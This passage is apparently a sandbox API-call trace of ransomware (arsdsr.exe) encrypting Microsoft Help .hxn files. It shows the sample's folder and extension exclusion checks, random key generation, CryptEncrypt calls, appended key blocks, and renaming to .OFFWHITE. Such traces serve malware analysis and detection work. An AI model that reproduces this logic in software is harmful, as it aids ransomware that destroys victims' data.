[0147.601] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\All Users\\Microsoft Help\\MS.WINPROJ.14.1033.hxn" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.WINPROJ.14.1033.hxn") returned="C:/Users\\All Users\\Microsoft Help\\MS.WINPROJ.14.1033.hxn" [0147.601] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.WINPROJ.14.1033.hxn.OFFWHITE") returned="C:/Users\\All Users\\Microsoft Help\\MS.WINPROJ.14.1033.hxn.OFFWHITE" [0147.601] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft Help\\MS.WINPROJ.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.winproj.14.1033.hxn"), lpNewFileName="C:/Users\\All Users\\Microsoft Help\\MS.WINPROJ.14.1033.hxn.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft help\\ms.winproj.14.1033.hxn.offwhite")) returned 1 [0147.602] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xaf766ee0, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xaf766ee0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xaf7d9300, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x16a, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="MS.WINPROJ.DEV.14.1033.hxn", cAlternateFileName="MSWINP~2.HXN")) returned 1 [0147.602] lstrcmpiW (lpString1="MS.WINPROJ.DEV.14.1033.hxn", lpString2=".") returned 1 [0147.602] lstrcmpiW (lpString1="MS.WINPROJ.DEV.14.1033.hxn", lpString2="..") returned 1 [0147.602] lstrcmpiW (lpString1="MS.WINPROJ.DEV.14.1033.hxn", lpString2="...") returned 1 [0147.602] lstrcmpiW (lpString1="MS.WINPROJ.DEV.14.1033.hxn", lpString2="windows") returned -1 [0147.602] lstrcmpiW (lpString1="MS.WINPROJ.DEV.14.1033.hxn", lpString2="$recycle.bin") returned 1 [0147.602] lstrcmpiW (lpString1="MS.WINPROJ.DEV.14.1033.hxn", lpString2="rsa") returned -1 [0147.602] lstrcmpiW (lpString1="MS.WINPROJ.DEV.14.1033.hxn", lpString2="ntuser.dat") returned -1 [0147.602] lstrcmpiW (lpString1="MS.WINPROJ.DEV.14.1033.hxn", lpString2="programdata") returned -1 [0147.602] lstrcmpiW (lpString1="MS.WINPROJ.DEV.14.1033.hxn", lpString2="appdata") returned 1 [0147.602] lstrcmpiW (lpString1="MS.WINPROJ.DEV.14.1033.hxn", lpString2="program files") returned -1 [0147.602] lstrcmpiW (lpString1="MS.WINPROJ.DEV.14.1033.hxn", lpString2="program files (x86)") returned -1 [0147.602] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Microsoft Help\\" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\") returned="C:/Users\\All Users\\Microsoft Help\\" [0147.602] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft Help\\", lpString2="MS.WINPROJ.DEV.14.1033.hxn" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn") returned="C:/Users\\All Users\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn" [0147.602] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.602] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.602] PathFindExtensionW (pszPath="MS.WINPROJ.DEV.14.1033.hxn") returned=".hxn" [0147.602] lstrcmpiW (lpString1=".hxn", lpString2=".exe") returned 1 [0147.602] lstrcmpiW (lpString1=".hxn", lpString2=".log") returned -1 [0147.602] lstrcmpiW (lpString1=".hxn", lpString2=".cab") returned 1 [0147.602] lstrcmpiW (lpString1=".hxn", lpString2=".cmd") returned 1 [0147.602] lstrcmpiW (lpString1=".hxn", lpString2=".com") returned 1 [0147.602] lstrcmpiW (lpString1=".hxn", lpString2=".cpl") returned 1 [0147.602] lstrcmpiW (lpString1=".hxn", lpString2=".ini") returned -1 [0147.602] lstrcmpiW (lpString1=".hxn", lpString2=".dll") returned 1 [0147.602] lstrcmpiW (lpString1=".hxn", lpString2=".url") returned -1 [0147.603] lstrcmpiW (lpString1=".hxn", lpString2=".ttf") returned -1 [0147.603] lstrcmpiW (lpString1=".hxn", lpString2=".mp3") returned -1 [0147.603] lstrcmpiW (lpString1=".hxn", lpString2=".pif") returned -1 [0147.603] lstrcmpiW (lpString1=".hxn", lpString2=".mp4") returned -1 [0147.603] lstrcmpiW (lpString1=".hxn", lpString2=".OFFWHITE") returned -1 [0147.603] lstrcmpiW (lpString1=".hxn", lpString2=".msi") returned -1 [0147.603] lstrcmpiW (lpString1="MS.WINPROJ.DEV.14.1033.hxn", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0147.603] GetProcessHeap () returned 0x500000 [0147.603] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x526d18 [0147.603] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.winproj.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0147.604] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=362) returned 1 [0147.604] GetProcessHeap () returned 0x500000 [0147.604] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b68 [0147.604] GetProcessHeap () returned 0x500000 [0147.604] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b80 [0147.604] GetProcessHeap () returned 0x500000 [0147.604] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565e90 [0147.604] GetProcessHeap () returned 0x500000 [0147.604] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565f98 [0147.604] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.604] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.604] SystemFunction036 (in: RandomBuffer=0x543b68, RandomBufferLength=0x10 | out: RandomBuffer=0x543b68) returned 1 [0147.604] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.604] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.604] SystemFunction036 (in: RandomBuffer=0x543b80, RandomBufferLength=0x10 | out: RandomBuffer=0x543b80) returned 1 [0147.605] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.605] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.605] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565e90*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x565e90*, pdwDataLen=0x295e310*=0x100) returned 1 [0147.605] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.605] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.605] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565f98*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x565f98*, pdwDataLen=0x295e30c*=0x100) returned 1 [0147.605] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x16a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.605] SetLastError (dwErrCode=0x0) [0147.605] WriteFile (in: hFile=0xb0, lpBuffer=0x565e90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x565e90*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0147.607] GetLastError () returned 0x0 [0147.607] GetLastError () returned 0x0 [0147.607] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x26a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.607] WriteFile (in: hFile=0xb0, lpBuffer=0x565f98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x565f98*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0147.607] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x36a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.607] WriteFile (in: hFile=0xb0, lpBuffer=0x526d18*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x526d18*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0147.607] GetProcessHeap () returned 0x500000 [0147.607] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x16a) returned 0x52ebe8 [0147.607] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.607] ReadFile (in: hFile=0xb0, lpBuffer=0x52ebe8, nNumberOfBytesToRead=0x16a, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x52ebe8*, lpNumberOfBytesRead=0x295e540*=0x16a, lpOverlapped=0x0) returned 1 [0147.607] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.607] WriteFile (in: hFile=0xb0, lpBuffer=0x52ebe8*, nNumberOfBytesToWrite=0x16a, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x52ebe8*, lpNumberOfBytesWritten=0x295e54c*=0x16a, lpOverlapped=0x0) returned 1 [0147.608] GetProcessHeap () returned 0x500000 [0147.608] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x52ebe8 | out: hHeap=0x500000) returned 1 [0147.608] CloseHandle (hObject=0xb0) returned 1 [0147.608] GetProcessHeap () returned 0x500000 [0147.608] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565e90 | out: hHeap=0x500000) returned 1 [0147.608] GetProcessHeap () returned 0x500000 [0147.608] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565f98 | out: hHeap=0x500000) returned 1 [0147.608] GetProcessHeap () returned 0x500000 [0147.608] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b68 | out: hHeap=0x500000) returned 1 [0147.608] GetProcessHeap () returned 0x500000 [0147.608] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b80 | out: hHeap=0x500000) returned 1 [0147.608] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\All Users\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn") returned="C:/Users\\All Users\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn" [0147.608] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn.OFFWHITE") returned="C:/Users\\All Users\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn.OFFWHITE" [0147.608] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.winproj.dev.14.1033.hxn"), lpNewFileName="C:/Users\\All Users\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft help\\ms.winproj.dev.14.1033.hxn.offwhite")) returned 1 [0147.609] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x1e67e130, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x1e67e130, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1e6f0550, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x152, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="MS.WINWORD.14.1033.hxn", cAlternateFileName="MSWINW~1.HXN")) returned 1 [0147.609] lstrcmpiW (lpString1="MS.WINWORD.14.1033.hxn", lpString2=".") returned 1 [0147.609] lstrcmpiW (lpString1="MS.WINWORD.14.1033.hxn", lpString2="..") returned 1 [0147.609] lstrcmpiW (lpString1="MS.WINWORD.14.1033.hxn", lpString2="...") returned 1 [0147.609] lstrcmpiW (lpString1="MS.WINWORD.14.1033.hxn", lpString2="windows") returned -1 [0147.609] lstrcmpiW (lpString1="MS.WINWORD.14.1033.hxn", lpString2="$recycle.bin") returned 1 [0147.609] lstrcmpiW (lpString1="MS.WINWORD.14.1033.hxn", lpString2="rsa") returned -1 [0147.609] lstrcmpiW (lpString1="MS.WINWORD.14.1033.hxn", lpString2="ntuser.dat") returned -1 [0147.609] lstrcmpiW (lpString1="MS.WINWORD.14.1033.hxn", lpString2="programdata") returned -1 [0147.609] lstrcmpiW (lpString1="MS.WINWORD.14.1033.hxn", lpString2="appdata") returned 1 [0147.609] lstrcmpiW (lpString1="MS.WINWORD.14.1033.hxn", lpString2="program files") returned -1 [0147.610] lstrcmpiW (lpString1="MS.WINWORD.14.1033.hxn", lpString2="program files (x86)") returned -1 [0147.610] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Microsoft Help\\" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\") returned="C:/Users\\All Users\\Microsoft Help\\" [0147.610] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft Help\\", lpString2="MS.WINWORD.14.1033.hxn" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.WINWORD.14.1033.hxn") returned="C:/Users\\All Users\\Microsoft Help\\MS.WINWORD.14.1033.hxn" [0147.610] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.610] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.610] PathFindExtensionW (pszPath="MS.WINWORD.14.1033.hxn") returned=".hxn" [0147.610] lstrcmpiW (lpString1=".hxn", lpString2=".exe") returned 1 [0147.610] lstrcmpiW (lpString1=".hxn", lpString2=".log") returned -1 [0147.610] lstrcmpiW (lpString1=".hxn", lpString2=".cab") returned 1 [0147.610] lstrcmpiW (lpString1=".hxn", lpString2=".cmd") returned 1 [0147.610] lstrcmpiW (lpString1=".hxn", lpString2=".com") returned 1 [0147.610] lstrcmpiW (lpString1=".hxn", lpString2=".cpl") returned 1 [0147.610] lstrcmpiW (lpString1=".hxn", lpString2=".ini") returned -1 [0147.610] lstrcmpiW (lpString1=".hxn", lpString2=".dll") returned 1 [0147.610] lstrcmpiW (lpString1=".hxn", lpString2=".url") returned -1 [0147.610] lstrcmpiW (lpString1=".hxn", lpString2=".ttf") returned -1 [0147.610] lstrcmpiW (lpString1=".hxn", lpString2=".mp3") returned -1 [0147.610] lstrcmpiW (lpString1=".hxn", lpString2=".pif") returned -1 [0147.610] lstrcmpiW (lpString1=".hxn", lpString2=".mp4") returned -1 [0147.610] lstrcmpiW (lpString1=".hxn", lpString2=".OFFWHITE") returned -1 [0147.610] lstrcmpiW (lpString1=".hxn", lpString2=".msi") returned -1 [0147.610] lstrcmpiW (lpString1="MS.WINWORD.14.1033.hxn", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0147.610] GetProcessHeap () returned 0x500000 [0147.610] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x526d28 [0147.610] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft Help\\MS.WINWORD.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.winword.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0147.611] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=338) returned 1 [0147.612] GetProcessHeap () returned 0x500000 [0147.612] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b80 [0147.612] GetProcessHeap () returned 0x500000 [0147.612] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b68 [0147.612] GetProcessHeap () returned 0x500000 [0147.612] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565f98 [0147.612] GetProcessHeap () returned 0x500000 [0147.612] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565e90 [0147.612] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.612] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.612] SystemFunction036 (in: RandomBuffer=0x543b80, RandomBufferLength=0x10 | out: RandomBuffer=0x543b80) returned 1 [0147.612] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.612] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.612] SystemFunction036 (in: RandomBuffer=0x543b68, RandomBufferLength=0x10 | out: RandomBuffer=0x543b68) returned 1 [0147.612] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.612] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.612] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565f98*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x565f98*, pdwDataLen=0x295e310*=0x100) returned 1 [0147.612] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.612] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.612] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565e90*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x565e90*, pdwDataLen=0x295e30c*=0x100) returned 1 [0147.613] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x152, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.613] SetLastError (dwErrCode=0x0) [0147.613] WriteFile (in: hFile=0xb0, lpBuffer=0x565f98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x565f98*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0147.614] GetLastError () returned 0x0 [0147.614] GetLastError () returned 0x0 [0147.614] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x252, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.614] WriteFile (in: hFile=0xb0, lpBuffer=0x565e90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x565e90*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0147.614] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x352, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.614] WriteFile (in: hFile=0xb0, lpBuffer=0x526d28*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x526d28*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0147.614] GetProcessHeap () returned 0x500000 [0147.614] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x152) returned 0x51d650 [0147.614] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.614] ReadFile (in: hFile=0xb0, lpBuffer=0x51d650, nNumberOfBytesToRead=0x152, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x51d650*, lpNumberOfBytesRead=0x295e540*=0x152, lpOverlapped=0x0) returned 1 [0147.614] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.614] WriteFile (in: hFile=0xb0, lpBuffer=0x51d650*, nNumberOfBytesToWrite=0x152, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x51d650*, lpNumberOfBytesWritten=0x295e54c*=0x152, lpOverlapped=0x0) returned 1 [0147.614] GetProcessHeap () returned 0x500000 [0147.615] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x51d650 | out: hHeap=0x500000) returned 1 [0147.615] CloseHandle (hObject=0xb0) returned 1 [0147.615] GetProcessHeap () returned 0x500000 [0147.615] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565f98 | out: hHeap=0x500000) returned 1 [0147.615] GetProcessHeap () returned 0x500000 [0147.615] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565e90 | out: hHeap=0x500000) returned 1 [0147.615] GetProcessHeap () returned 0x500000 [0147.615] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b80 | out: hHeap=0x500000) returned 1 [0147.615] GetProcessHeap () returned 0x500000 [0147.615] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b68 | out: hHeap=0x500000) returned 1 [0147.615] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\All Users\\Microsoft Help\\MS.WINWORD.14.1033.hxn" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.WINWORD.14.1033.hxn") returned="C:/Users\\All Users\\Microsoft Help\\MS.WINWORD.14.1033.hxn" [0147.615] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.WINWORD.14.1033.hxn.OFFWHITE") returned="C:/Users\\All Users\\Microsoft Help\\MS.WINWORD.14.1033.hxn.OFFWHITE" [0147.615] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft Help\\MS.WINWORD.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.winword.14.1033.hxn"), lpNewFileName="C:/Users\\All Users\\Microsoft Help\\MS.WINWORD.14.1033.hxn.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft help\\ms.winword.14.1033.hxn.offwhite")) returned 1 [0147.616] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x1e67e130, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x1e67e130, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1e6f0550, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x16a, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="MS.WINWORD.DEV.14.1033.hxn", cAlternateFileName="MSWINW~2.HXN")) returned 1 [0147.616] lstrcmpiW (lpString1="MS.WINWORD.DEV.14.1033.hxn", lpString2=".") returned 1 [0147.616] lstrcmpiW (lpString1="MS.WINWORD.DEV.14.1033.hxn", lpString2="..") returned 1 [0147.616] lstrcmpiW (lpString1="MS.WINWORD.DEV.14.1033.hxn", lpString2="...") returned 1 [0147.616] lstrcmpiW (lpString1="MS.WINWORD.DEV.14.1033.hxn", lpString2="windows") returned -1 [0147.616] lstrcmpiW (lpString1="MS.WINWORD.DEV.14.1033.hxn", lpString2="$recycle.bin") returned 1 [0147.616] lstrcmpiW (lpString1="MS.WINWORD.DEV.14.1033.hxn", lpString2="rsa") returned -1 [0147.616] lstrcmpiW (lpString1="MS.WINWORD.DEV.14.1033.hxn", lpString2="ntuser.dat") returned -1 [0147.616] lstrcmpiW (lpString1="MS.WINWORD.DEV.14.1033.hxn", lpString2="programdata") returned -1 [0147.616] lstrcmpiW (lpString1="MS.WINWORD.DEV.14.1033.hxn", lpString2="appdata") returned 1 [0147.616] lstrcmpiW (lpString1="MS.WINWORD.DEV.14.1033.hxn", lpString2="program files") returned -1 [0147.616] lstrcmpiW (lpString1="MS.WINWORD.DEV.14.1033.hxn", lpString2="program files (x86)") returned -1 [0147.616] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Microsoft Help\\" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\") returned="C:/Users\\All Users\\Microsoft Help\\" [0147.616] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft Help\\", lpString2="MS.WINWORD.DEV.14.1033.hxn" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn") returned="C:/Users\\All Users\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn" [0147.616] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.616] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.616] PathFindExtensionW (pszPath="MS.WINWORD.DEV.14.1033.hxn") returned=".hxn" [0147.616] lstrcmpiW (lpString1=".hxn", lpString2=".exe") returned 1 [0147.616] lstrcmpiW (lpString1=".hxn", lpString2=".log") returned -1 [0147.616] lstrcmpiW (lpString1=".hxn", lpString2=".cab") returned 1 [0147.616] lstrcmpiW (lpString1=".hxn", lpString2=".cmd") returned 1 [0147.616] lstrcmpiW (lpString1=".hxn", lpString2=".com") returned 1 [0147.616] lstrcmpiW (lpString1=".hxn", lpString2=".cpl") returned 1 [0147.616] lstrcmpiW (lpString1=".hxn", lpString2=".ini") returned -1 [0147.616] lstrcmpiW (lpString1=".hxn", lpString2=".dll") returned 1 [0147.616] lstrcmpiW (lpString1=".hxn", lpString2=".url") returned -1 [0147.616] lstrcmpiW (lpString1=".hxn", lpString2=".ttf") returned -1 [0147.617] lstrcmpiW (lpString1=".hxn", lpString2=".mp3") returned -1 [0147.617] lstrcmpiW (lpString1=".hxn", lpString2=".pif") returned -1 [0147.617] lstrcmpiW (lpString1=".hxn", lpString2=".mp4") returned -1 [0147.617] lstrcmpiW (lpString1=".hxn", lpString2=".OFFWHITE") returned -1 [0147.617] lstrcmpiW (lpString1=".hxn", lpString2=".msi") returned -1 [0147.617] lstrcmpiW (lpString1="MS.WINWORD.DEV.14.1033.hxn", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0147.617] GetProcessHeap () returned 0x500000 [0147.617] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x526d38 [0147.617] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.winword.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0147.618] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=362) returned 1 [0147.618] GetProcessHeap () returned 0x500000 [0147.618] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b68 [0147.618] GetProcessHeap () returned 0x500000 [0147.618] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b80 [0147.618] GetProcessHeap () returned 0x500000 [0147.618] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565e90 [0147.618] GetProcessHeap () returned 0x500000 [0147.618] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565f98 [0147.618] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.618] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.618] SystemFunction036 (in: RandomBuffer=0x543b68, RandomBufferLength=0x10 | out: 